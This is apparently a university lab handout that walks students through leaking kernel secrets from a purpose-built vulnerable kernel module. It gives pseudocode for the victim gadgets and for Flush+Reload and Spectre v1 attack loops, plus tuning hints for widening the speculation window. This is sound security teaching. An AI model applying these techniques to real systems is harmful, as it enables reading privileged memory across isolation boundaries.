
Spectre Attacks Lab

Due Date: Mar 21; Last Updated Date: Feb 14

Table of Contents

Collaboration Policy

Our full Academic Honesty policy can be found on the Course Information page of our website. As a reminder, all 6.5950/6.5951 labs should be completed individually. You may discuss the lab at a high level with a classmate, but you may not work on code together or share any of your code.

Getting Started

Log into your assigned machine. Your credentials and machine information have been emailed to you. It will be one of the arch-sec-[1-4].csail.mit.edu machines. To connect via ssh, run ssh username@arch-sec-X.csail.mit.edu.

We are using git for all the labs – instructions for setting up the git repository can be found on the labs page.

In addition to submitting code, you are required to submit a PDF lab report containing your answers to Discussion Questions to gradescope. We provide a markdown template in the starter code (report.md).

Introduction

In this lab, you will complete the following tasks:

  1. Understand how Spectre works across privilege boundaries.
  2. Solve three CTF (capture-the-flag) puzzles of increasing difficulty. You will start by implementing the basic Spectre attack. We will then test your understanding of how the hardware works by challenging you to implement an advanced Spectre attack in the last part of this lab.

Part 0: Lab Infrastructure

Interacting with Linux Kernel

The highlight of this lab is that you will implement your own version of the famous Spectre attack and use it to leak secrets from the Linux kernel, across privilege boundaries. It presents a good opportunity for you to understand the existing technique used to isolate kernelspace from userspace.

Our virtual address space is divided into the kernelspace and the userspace. Unprivileged application code resides in the userspace, as shown in the figure below, and is subject to several restrictions: it cannot directly access kernelspace data, nor can it branch into the kernelspace and execute kernel code. For example, a load from 0xABCD (a kernelspace virtual address) will fail the page permission check, which a C program observes as a segmentation fault. Similarly, executing the instruction jump 0x1234 will also terminate the program with a segmentation fault.

So how can userspace code interact with the kernelspace while preserving privilege isolation? The sanctioned way is to use the API interface that the kernelspace exposes. When userspace calls a kernel API, control transfers to the kernelspace entrypoint (the only place in the kernel that allows a transition from userspace). The entrypoint code performs the substantial bookkeeping required for a context switch and then jumps to the requested API function.

In our lab infrastructure, we provide a custom Linux kernel module (blue box) sitting in the kernelspace. This kernel module provides a limited interface for userspace code to call into. The module is embedded with vulnerable Spectre gadgets; it operates on some secret data (red box) and uses the secret data as addresses to access the shared buffer (green box). Read the section at the end of this handout for more details about how the lab infrastructure is designed. Naturally, your code, residing in the userspace, cannot directly access the secret buffer in the kernelspace. Fortunately, the kernelspace and userspace code, when they execute, share all the microarchitectural structures.

Lab Infrastructure Setup

The Secret

The secret in each part is a string of the form MIT{some_secret_value}. The string can be up to 64 bytes, including the NULL terminator. You can consider the secret complete once you leak the NULL terminator.

The characters in the string may NOT be printable ASCII. Your code should be able to leak arbitrary 8-bit secrets byte by byte.

Do not make any assumption about the secret other than it is a NULL terminated string of length up to 64 bytes (including the NULL terminator). The secrets will not change from run to run (they are constant for the lifetime of the kernel module). During grading, we may use different secret values to evaluate your implementation.

Code Skeleton

  • inc/labspectre.h and src-common/spectre_lab_helper.c provide a set of utility functions for you to use.
  • src-common/main.c is used in all three parts. The main function sets up a shared memory region (shared_memory corresponding to the green box in the figure above) of size SHD_SPECTRE_LAB_SHARED_MEMORY_SIZE bytes, which is shared between the userspace and kernel. It also sets up a file descriptor for communicating with the kernel module. The technique behind this communication is called procfs write handling, detailed in the section at the end of this handout.
  • inc/labspectreipc.h contains bindings for the interface to the kernel module from userspace. You do not need to understand this, as our provided code handles the communication with the kernel.
  • part1-src/attacker-part1.c is the file you will modify in Part 1. The method call_kernel_part1 can be used for calling into the kernel module. The code for Part 2 and Part 3 follows the exact same pattern.

Compile, Test, and Autograde

This lab will be autograded. After you hand in your code, we will embed different secret strings in the kernel and rerun your code to see whether it effectively leaks these strings. If your code works reliably with the autograder, you should expect no surprises with your grade. Instructions for compiling the code and running the autograder are below.

From the root directory, use make to compile the project. The binaries part[1-3] will be produced in the same directory (run them by calling ./part[1-3]). The results of your code will be printed to the console; on success you should see the secret leaked from kernel memory.

An example of the expected output is below:

$ ./part1
MIT{part1_secret_value}

You can invoke the autograder with ./check.py X, where X is the part to check.

An example of the expected output is below:

$ ./check.py 1
Checking part 1 ...
You passed 950 of 1000 runs (95.0%)
Success! Good job

You can check all parts at once with make and then ./check.py all

Part 1: Leaking Kernel Memory via Flush+Reload (35%)

In this part you will set up a cache-based side channel to leak information from the kernel using Flush+Reload.

Get to Know the Victim

The pseudocode for the kernel victim code of Part 1 is shown below.

def victim_part1(shared_mem, offset):
    secret_data = part1_secret[offset]
    load shared_mem[4096 * secret_data]

The victim function takes a pointer shared_mem and an integer offset as input. Both are passed from the userspace and controlled by the attacker, i.e., you. The variable shared_mem points to the start of the shared memory region, the green box in the figure above.

First, the code loads a secret byte from a secret array named part1_secret, located inside the kernelspace. The byte to leak is chosen by the attacker-controlled offset: when the offset is 0, the first secret byte is loaded; when it is 1, the second byte is loaded, and so on. Next, the victim multiplies the secret byte by 4096 and uses the result as an index into the shared memory array. For example, if the secret byte were the character ‘A’ (0x41), then the first cache line of the 0x41’th page in the shared memory region would be loaded into the cache.

Your Attack Plan

Recall that the secret is a string up to 64 characters long (including the NULL terminator). The attacker can leak the secret one byte at a time using Flush+Reload. Reuse your attack strategy from Part 2 of the cache lab here, with the only difference being that the attacker must call the victim code to perform the secret-dependent memory access. Without loss of generality, we summarize the attack outline for you below.

  1. Flush the memory region from the cache using clflush.
  2. Call the victim method using the desired offset to leak the secret byte.
  3. Reload the memory region, measure the latency of accessing each address, and use the latency to derive the value of the secret. When the value is 0x00 (i.e. NULL), the attack is complete.
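Put together, the per-byte loop looks roughly like the sketch below, written in the same pseudocode style as the victim code. Here flush and time_access stand for the cache-flush and timed-load helpers you will use, and THRESHOLD is a latency cutoff you must calibrate yourself:

```
def leak_byte(kernel_fd, shared_mem, offset):
    # Step 1: flush every candidate line from the cache
    for guess in range(256):
        flush(shared_mem[4096 * guess])

    # Step 2: the victim performs the secret-dependent access
    call_kernel_part1(kernel_fd, shared_mem, offset)

    # Step 3: reload and time each candidate; the fast one was cached
    for guess in range(256):
        if time_access(shared_mem[4096 * guess]) < THRESHOLD:
            return guess
```

Repeating this with offset = 0, 1, 2, … recovers the string byte by byte until the NULL terminator appears.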

1-1 Discussion Question

Given the attack plan above, how many addresses need to be flushed in the first step?

Allowed Code

You can define your own helper methods as you desire. You can use any method in inc/labspectre.h as well as the provided methods in part1-src/attacker-part1.c.

You should only use the provided call_kernel_part1 method to interact with the kernel module. This function takes three arguments: a file descriptor to the kernel module, a pointer to the shared memory region, and an offset. kernel_fd and shared_memory can be directly passed to this method without modification. The offset for a given invocation is up to you.

Build your attack step-by-step: start by leaking one character first, then try to leak the whole string.

1-2 Exercise

Implement the Flush+Reload attack in part1-src/attacker-part1.c to leak the secret string. Build the project with make and run ./part1 from the main directory to see if you get the secret. Run ./check.py 1 from the main directory to repeat the experiment multiple (5 by default) times.

Submission and Grading

Submit your code part1-src/attacker-part1.c to your assigned Github repo. Full credit will be awarded to solutions that report the correct secret at least 80% of the time, while partial credit will be awarded for solutions which perform worse than that. Each attempt (i.e., each run of ./part1) should take no longer than 30 seconds.

Part 2: Basic Spectre (40%)

Now that Flush+Reload is working, let’s move on to actually implementing a Spectre attack!

Get to Know the Victim

Below is the pseudocode for Part 2’s victim code. This victim is quite similar to Part 1’s, except it only performs the load if the offset is within a specific range (e.g., offset < 4).

part2_limit = 4
def victim_part2 (shared_mem, offset):
    secret_data = part2_secret[offset]
    mem_index = 4096 * secret_data

    # to delay the subsequent branch
    flush(part2_limit)

    if offset < part2_limit:
        load shared_mem[mem_index]    

2-1 Discussion Question

Copy your code in run_attacker from attacker-part1.c to attacker-part2.c. Does your Flush+Reload attack from Part 1 still work? Why or why not?

Attack Outline

Below are the steps required to leak a single byte. You may need to alter your approach to account for system noise.

  1. Train the branch predictor to speculatively perform the load operation (i.e., take the branch).
  2. Flush the shared memory region from the cache using clflush.
  3. Call the victim function with an offset beyond the limit, leaking the secret byte during speculative execution.
  4. Reload the memory region, measure the latency of accessing each address, and use the latency to determine the value of the secret.
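The steps above can be sketched in the same pseudocode style as before. TRAIN_COUNT and THRESHOLD are parameters you must tune yourself; the in-bounds training offset simply needs to satisfy offset < part2_limit:

```
def leak_byte_part2(kernel_fd, shared_mem, target_offset):
    # Step 1: train the predictor with in-bounds calls (branch taken)
    for i in range(TRAIN_COUNT):
        call_kernel_part2(kernel_fd, shared_mem, 0)   # 0 < part2_limit

    # Step 2: flush all candidate lines from the cache
    for guess in range(256):
        flush(shared_mem[4096 * guess])

    # Step 3: out-of-bounds call; the load happens only speculatively
    call_kernel_part2(kernel_fd, shared_mem, target_offset)

    # Step 4: reload and time to find the speculatively-touched line
    for guess in range(256):
        if time_access(shared_mem[4096 * guess]) < THRESHOLD:
            return guess
```

Note that the flush happens after training: the training calls themselves perform secret-dependent loads, and flushing afterwards removes that pollution before the measured run.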

As you’ve observed in previous labs, side channel attacks generally do not work on the first attempt. You should try to use the good practices you have learned from the cache lab when attempting for any microarchitectural attacks. For example,

  • DO NOT measure while printing.
  • To improve attack precision, you can repeat measurements multiple times and use statistical methods to decode the secret.
  • Try to avoid syscall-related functions during the attack. Both printf and sleep generate enough noise to seriously disrupt your cache state and your branch predictor state.
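For instance, one simple statistical method is a majority vote over repeated trials, sketched here in the handout's pseudocode style (leak_byte stands for one noisy single-shot attempt, and NUM_TRIALS is yours to tune):

```
def leak_byte_robust(kernel_fd, shared_mem, offset):
    votes = [0] * 256
    for trial in range(NUM_TRIALS):
        guess = leak_byte(kernel_fd, shared_mem, offset)  # one noisy attempt
        if guess is not None:
            votes[guess] += 1
    return index_of_max(votes)   # the most frequently observed value wins
```

A single wrong measurement then no longer corrupts the recovered byte, at the cost of NUM_TRIALS times more victim calls.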

In addition, here is one more hint specific to the branch predictor. Modern processors employ branch predictors of significant complexity. Branch predictors can use global prediction histories, which allow different branches to interfere with each other. Moreover, the branch predictor is shared between the userspace and the kernelspace. If the speculation is not working as expected, you may need to reduce the number of branches in your attack code.

2-2 Exercise

Implement the Spectre attack in attacker-part2.c to leak the secret string. Build the project with make and run ./part2 to see if you get the secret. Run ./check.py 2 to repeat the experiment multiple (5 by default) times.

2-3 Discussion Question

In our example, the attacker tries to leak the values in the array secret_part2. In a real-world attack, attackers can use Spectre to leak data located in an arbitrary address in the victim’s space. Explain how an attacker can achieve such leakage.

2-4 Discussion Question

Experiment with how often you train the branch predictor. What is the minimum number of times you need to train the branch (i.e. if offset < part2_limit) to make the attack work?

Submission and Grading

This part is graded in the same way as Part 1. Full credit will be awarded to solutions that report the correct secret at least 80% of the time, while partial credit will be awarded for solutions which perform worse than that. Each attempt (i.e., each run of ./part2) should take no longer than 30 seconds.

Part 3: Advanced Spectre (25%)

Now that we’ve got our Spectre attack working, let’s try a harder version of the same problem.

Get to Know the Victim

Below is the pseudocode for Part 3:

part3_limit = 4
def victim_part3 (shared_mem, offset):
    if offset < part3_limit:
        false_dependency = lengthy computation # the computation result is 0
        secret_data = part3_secret[offset]
        mem_index = 4096 * secret_data
        load shared_mem[mem_index + false_dependency]

There are two key differences in the victim code compared to Part 2. First, the victim no longer flushes the limit variable (part3_limit) before the branch. Second, we have added a false dependency before the memory access, making the memory access start later in the speculation window.

If you copy run_attacker from Part 2, you should see that your attack does not work with the new victim. This is because in the modified victim code, the memory access instruction we try to monitor may not be issued speculatively for three reasons:

  1. The speculation window becomes shorter. The speculation window starts at the cycle the branch (if offset < part3_limit) enters the processor, and ends at the cycle the branch condition is resolved. If the part3_limit variable is cached, it takes very little time to obtain its value, detect the misprediction, and squash the instructions after the branch, leaving only a short window for speculative execution.
  2. The issue time of the secret-dependent memory access is delayed. Due to the data dependency between the false_dependency line and the load shared_mem line, the secret-dependent memory access can only be issued after the variable false_dependency is computed. It is possible that the branch condition is resolved before the speculative load even executes.
  3. There is a hidden source of timing delay due to TLB misses. Feel free to refer to the section at the end of this handout for more information. You do not need to understand this factor for making your attack work.

To make your attack work, you will need to find a way to widen the speculation window so that the speculative load has a higher chance of occurring. Note that you cannot change the long-latency false dependency. As before, follow the good practices for microarchitectural attacks: do not use syscall-related functions, such as printf and sleep, during the attack.

Note

If your implementation from Part 2 passes the test for Part 3, congratulations, and please reach out to us! We designed this part to defeat basic Spectre attack implementations, and we’d be curious to learn how you made yours work in one shot.

3-1 Exercise

Optimize the attack in attacker-part3.c to leak the secret string. Build the project with make and run ./part3 to see if you get the secret. Run ./check.py 3 to repeat the experiment multiple (5 by default) times.

3-2 Discussion Question

Describe the strategy you employed to extend the speculation window of the target branch in the victim.

3-3 Discussion Question

Assume you are an attacker looking to exploit a new machine that has the same kernel module installed as the one we attacked in this part. What information would you need to know about this new machine to port your attack? Could it be possible to determine this information experimentally? Briefly describe in 5 sentences or less.

Submission and Grading

Full credit will be awarded to solutions that report the correct secret at least 20% of the time, while partial credit will be awarded for solutions which perform worse than that. Each attempt (i.e., each run of ./part3) should take no longer than 10 minutes. We will give partial credit if the attack can recover some part of the secret string.

You can check all parts at once with make and then ./check.py all

As always, do not forget to include answers to the discussion questions in your lab report and submit the report to gradescope.

Behind the Scenes: How was this lab infrastructure developed?

For those who are curious, here is a brief description of how this lab infrastructure was developed. The victims you interact with are part of a custom kernel module; you can find its source code in module-src/labspectrekm.c. The communication between the userspace and the kernel module is handled using a technique called procfs write handling. Specifically, whenever the userspace code writes to a file (i.e., /proc/labspectre-victim), a procfs write handler (the spectre_lab_victim_write function in module-src/labspectrekm.c) in the kernel module executes, using the written data (the local_cmd variable in the call_kernel_partX functions) as its userbuf argument.
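In outline, a call into the module therefore reduces to an ordinary write syscall, sketched below in the handout's pseudocode style (the actual command encoding lives in inc/labspectreipc.h and is handled for you by the call_kernel_partX helpers):

```
def call_kernel(kernel_fd, cmd):
    # userspace: write() on the fd for /proc/labspectre-victim
    write(kernel_fd, cmd)
    # kernel: spectre_lab_victim_write runs with cmd as its userbuf
    # argument, decodes it, and invokes the requested victim function
```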

On the lab machine, SMAP (supervisor mode access prevention) and SMEP (supervisor mode execution prevention) are both on, which means that the kernel cannot directly read or execute userspace memory. You may wonder, in this case, how the kernel can read the shared_mem array, which is located in the userspace. This is done by temporarily remapping an alias of the shared memory region into the kernelspace. What we end up with is two different virtual addresses, one in the userspace and one in the kernelspace, both mapping to the same physical address. This is similar to what we saw in Part 2 of the cache lab, where two virtual addresses in two processes are mapped to the same physical address.

The interaction between the kernel module and the userspace code involves context switches. When the userspace code calls the kernel module (via the write syscall), the processor transitions from the userspace to the kernelspace, which flushes some microarchitectural structures, such as TLBs. The custom kernel module then creates an alias mapping for the shared memory region and executes the requested function. Before returning to the userspace, it unmaps the shared region. Therefore, every time the kernel module is called, the first access to each page incurs a TLB miss. In Part 2, we deliberately prevent these TLB misses to make your attack easier, by forcing page walks before performing any secret-dependent memory accesses. In Part 3, these redundant accesses are removed, so in addition to the false dependency, TLB misses also contribute extra latency. You will need to craft an advanced Spectre attack that succeeds despite this added latency.

Acknowledgements

Contributors: Joseph Ravichandran, Mengjia Yan, Peter Deutsch.